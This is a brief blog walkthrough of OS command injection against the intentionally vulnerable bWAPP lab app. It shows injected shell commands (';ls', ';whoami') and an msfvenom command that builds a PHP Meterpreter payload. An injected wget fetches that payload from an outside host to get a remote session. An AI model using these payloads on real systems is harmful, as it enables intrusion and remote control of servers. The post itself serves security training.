OS Command Injection Unauthorized Access

2 Ocak 2018 Salı

OS Command Injection Unauthorized Access

Hello Everyone :)


bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.

bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful penetration testing and ethical hacking projects. What makes bWAPP so unique? Well, it has over 100 web bugs! It covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project. The focus is not just on one specific issue... bWAPP is covering a wide range of vulnerabilities!

bWAPP is a PHP application that uses a MySQL database. It can be hosted on Linux/Windows with Apache/IIS and MySQL. It is supported on WAMP or XAMPP. Another possibility is to download bee-box, a custom VM pre-installed with bWAPP.

This project is part of the ITSEC GAMES project. You can find more about the ITSEC GAMES and bWAPP projects on our blog.

For security-testing and educational purposes only!


 Os Command Injection

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell.

 In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands.

Code    ;ls 

Code ;pwd 

Code ;whoami

Using the MSFvenom Command Line Interface

Msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.

Msfvenom replaced both msfpayload and msfencode as of June 8th, 2015.
The advantages of msfvenom are:
  • One single tool
  • Standardized command line options
  • Increased speed



msfvenom -p php/meterpreter/bind_tcp LHOST=ipaddress LPORT=4448 > berkdusunur.php

Code ;wget http://ip.add.re.ss/berkdusunur.php

And Meterpreter :)

Thank You For Reading 

You can follow  us on twitter @berkdusunur

0 yorum :

Yorum Gönder